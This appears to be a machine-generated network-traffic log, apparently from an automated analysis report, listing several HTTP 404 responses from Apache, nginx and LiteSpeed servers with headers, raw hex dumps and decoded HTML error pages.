Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 28 Nov 2022 09:22:52 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://xn--299aa717y.xn--3e0b707e/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gziphost-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==X-Endurance-Cache-Level: 2X-nginx-cache: WordPressContent-Length: 11649Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 72 6d 8f ec c8 75 de 67 cd af a8 db 8b dd 99 96 ba d8 24 fb bd 7b 7a 64 ed 6a b5 16 a2 b5 85 bd 2b 1b 81 56 b8 a8 26 0f c9 da 29 56 d1 c5 e2 74 f7 8e 07 10 10 c7 f0 1b 9c 04 96 61 23 90 02 1b 88 e1 04 f9 22 24 0a a0 0f 49 7e 90 f6 ea 3f e4 14 d9 ef c3 9e e9 3b f7 5e 19 89 76 5e 48 d6 a9 73 9e f3 9c e7 3c 97 cf be fd fb 1f 7c fa af bf ff 21 49 4c 2a ae ce 2e ed 8b 08 26 e3 69 e3 5a d1 7f f5 49 c3 c6 80 85 57 67 5f bb 4c c1 30 12 24 4c e7 60 a6 8d 1f 7c fa 1d 3a 6c 90 f6 e6 46 b2 14 a6 8d 1b 0e f3 4c 69 d3 20 81 92 06 24 66 ce 79 68 92 69 08 37 3c 00 5a 1e 5a 84 4b 6e 38 13 34 0f 98 80 a9 57 e2 ec c0 9c 6b 35 53 26 3f df 80 9c 4b c5 65 08 8b 16 91 2a 52 42 a8 f9 79 59 62 b8 11 70 f5 eb bf fe fb 97 3f fb c5 cb 7f fe f1 97 ff f4 bf c8 cb 9f ff 9f 97 3f fb 13 f2 f2 cf fe 9e bc fc bb 3f 7d f9 b3 bf 22 ef bd 33 f4 3d 6f 42 62 15 2b a3 b2 cb 76 55 75 76 29 b8 bc 26 1a c4 f4 3c 94 39 cd 34 44 60 82 e4 9c 24 f8 35 3d 6f b7 17 92 52 7f 34 62 6c e0 0d 96 8e 3d 75 c0 9d 0d dc 01 54 dd 37 f5 0d 26 0c 68 c9 0c 34 88 59 66 a8 03 cb 32 c1 03 66 b8 92 6d 9d e7 df 58 a4 02 af 6c df 69 63 c5 83 bc a7 d9 1f 15 6a 42 7e fd 93 ff f5 e5 df fc b4 51 b5 6d 24 c6 64 e3 87 7a b7 23 80 b0 dd 78 93 0c be fc ab bf f9 d5 2f 7f fc ca 44 02 95 a6 b8 9d 7c 97 51 1e 68 9e 99 ab b3 39 ee 4b cd 9d 17 f3 0c 52 f5 39 7f 0e c6 70 19 e7 64 4a 6e 1b 33 96 c3 0f b4 68 8c cb 1e f9 f8 b3 f6 67 ed dc 99 3b 4a c7 9f b5 79 ca 62 c8 3f 43 70 0d 9f b5 cb e2 cf da 5e d7 71 1d f7 b3 f6 c0 5f 0c fc cf da 8d 56 03 16 06 eb 9d 4c c6 78 c8 6f e2 a7 e1 61 61 89 86 ef 0f 2b 40 fc b2 67 55 e8 00 1a e3 db 06 3a 10 45 2c cb 56 f8 25 fc 71 55 3e 6b cf 33 ca 65 20 8a d0 b6 fd 3c 2f 03 25 00 c5 4d 01 ce ee a4 5c 3a 9f e7 df bc 01 3d ed 3b 9e e3 35 ee ee 26 67 ed af 3f 23 9f 26 3c 27 11 17 40 f0 cd 0a a3 68 0c 12 34 12 08 c9 d7 db 67 cf a2 42 06 76 a3 17 d0 62 2d d3 bc bd 61 9a c8 96 6e a9 16 9f 32 27 d0 80 99 1f 0a b0 5b b9 68 04 4c de b0 bc d1 6c 65 53 ee c4 60 3e 50 d2 a0 6c ef bd b7 7b ba 68 f8 61 a3 39 59 03 93 1c a1 57 c0 6c fa dc 68 5c 9a 13 69 95 7e 90 30 fd 81 0a a1 05 d3 8b cc 09 70 0e fd 09 04 e6 c2 6d b9 2d ee cc 79 68 12 7c 27 c0 e3 c4 60 47 07 87 10 9f 5a 7c e6 58 27 2e 2f 0c 8e d6 82 26 a6 bb 4d cc 34 ea db cc b0 1f 7c f2 bd 8b 66 73 a2 c1 14 5a 92 a7 e3 9a 15 2e 4c a7 d3 3d ec bb cd 60 c1 05 54 63 99 fb 4a 55 a6 45 19 8c 93 eb Data Ascii: rmug${zdj+V&)Vta#"$I~?;^v^Hs<|
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 28 Nov 2022 09:22:54 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://xn--299aa717y.xn--3e0b707e/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-Encodinghost-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==X-Endurance-Cache-Level: 2X-nginx-cache: WordPressTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 32 37 37 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6b 6f 2d 4b 52 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 74 69 74 6c 65 3e ed 8e 98 ec 9d b4 ec a7 80 eb a5 bc 20 ec b0 be ec 9d 84 20 ec 88 98 20 ec 97 86 ec 9d 8c 20 26 23 38 32 31 31 3b 20 67 6f 67 6f 74 6f 70 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 78 6e 2d 2d 32 39 39 61 61 37 31 37 79 2e 78 6e 2d 2d 33 65 30 62 37 30 37 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 67 6f 67 6f 74 6f 70 20 26 72 61 71 75 6f 3b 20 ed 94 bc eb 93 9c 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 78 6e 2d 2d 32 39 39 61 61 37 31 37 79 2e 78 6e 2d 2d 33 65 30 62 37 30 37 65 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 67 6f 67 6f 74 6f 70 20 26 72 61 71 75 6f 3b 20 eb 8c 93 ea b8 80 20 ed 94 bc eb 93 9c 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 78 6e 2d 2d 32 39 39 61 61 37 31 37 79 2e 78 6e 2d 2d 33 65 30 62 37 30 37 65 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 34 2e 30 2e 30 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 34 2e 30 2e 30 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 Data Ascii: 277a<!DOCTYPE html><html lang="ko-KR"><head><meta charset="UTF-8" /><meta name
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 28 Nov 2022 09:24:36 GMTServer: ApacheContent-Length: 570Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 6e 6f 74 2d 66 6f 75 6e 64 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 73 22 3e 0a 20 20 20 20 20 20 3c 70 3e 34 30 34 3c 62 72 3e 0a 20 20 20 20 20 20 20 3c 73 6d 61 6c 6c 3e 50 41 47 45 20 4e 4f 54 20 46 4f 55 4e 44 3c 2f 73 6d 61 6c 6c 3e 0a 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 62 69 67 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 6d 65 64 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 73 6d 61 6c 6c 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 27 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 32 2e 31 2e 33 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Error</title> <link rel="stylesheet" href="/style.css"></head><body><body> <section id="not-found"> <div class="circles"> <p>404<br> <small>PAGE NOT FOUND</small> </p> <span class="circle big"></span> <span class="circle med"></span> <span class="circle small"></span> </div> </section> </body> <script src='//cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script><script src="/script.js"></script></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 28 Nov 2022 09:24:38 GMTServer: ApacheContent-Length: 570Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 6e 6f 74 2d 66 6f 75 6e 64 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 73 22 3e 0a 20 20 20 20 20 20 3c 70 3e 34 30 34 3c 62 72 3e 0a 20 20 20 20 20 20 20 3c 73 6d 61 6c 6c 3e 50 41 47 45 20 4e 4f 54 20 46 4f 55 4e 44 3c 2f 73 6d 61 6c 6c 3e 0a 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 62 69 67 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 6d 65 64 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 73 6d 61 6c 6c 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 27 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 32 2e 31 2e 33 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Error</title> <link rel="stylesheet" href="/style.css"></head><body><body> <section id="not-found"> <div class="circles"> <p>404<br> <small>PAGE NOT FOUND</small> </p> <span class="circle big"></span> <span class="circle med"></span> <span class="circle small"></span> </div> </section> </body> <script src='//cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script><script src="/script.js"></script></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 28 Nov 2022 09:24:40 GMTServer: ApacheContent-Length: 570Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 6e 6f 74 2d 66 6f 75 6e 64 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 73 22 3e 0a 20 20 20 20 20 20 3c 70 3e 34 30 34 3c 62 72 3e 0a 20 20 20 20 20 20 20 3c 73 6d 61 6c 6c 3e 50 41 47 45 20 4e 4f 54 20 46 4f 55 4e 44 3c 2f 73 6d 61 6c 6c 3e 0a 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 62 69 67 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 6d 65 64 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 73 6d 61 6c 6c 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 27 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 32 2e 31 2e 33 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Error</title> <link rel="stylesheet" href="/style.css"></head><body><body> <section id="not-found"> <div class="circles"> <p>404<br> <small>PAGE NOT FOUND</small> </p> <span class="circle big"></span> <span class="circle med"></span> <span class="circle small"></span> </div> </section> </body> <script src='//cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script><script src="/script.js"></script></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 28 Nov 2022 09:24:42 GMTServer: ApacheContent-Length: 570Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 6e 6f 74 2d 66 6f 75 6e 64 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 73 22 3e 0a 20 20 20 20 20 20 3c 70 3e 34 30 34 3c 62 72 3e 0a 20 20 20 20 20 20 20 3c 73 6d 61 6c 6c 3e 50 41 47 45 20 4e 4f 54 20 46 4f 55 4e 44 3c 2f 73 6d 61 6c 6c 3e 0a 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 62 69 67 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 6d 65 64 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 73 6d 61 6c 6c 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 27 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 32 2e 31 2e 33 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Error</title> <link rel="stylesheet" href="/style.css"></head><body><body> <section id="not-found"> <div class="circles"> <p>404<br> <small>PAGE NOT FOUND</small> </p> <span class="circle big"></span> <span class="circle med"></span> <span class="circle small"></span> </div> </section> </body> <script src='//cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script><script src="/script.js"></script></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 28 Nov 2022 09:24:48 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 28 Nov 2022 09:24:50 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 28 Nov 2022 09:24:53 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 28 Nov 2022 09:24:55 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Mon, 28 Nov 2022 09:25:00 GMTserver: LiteSpeedvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 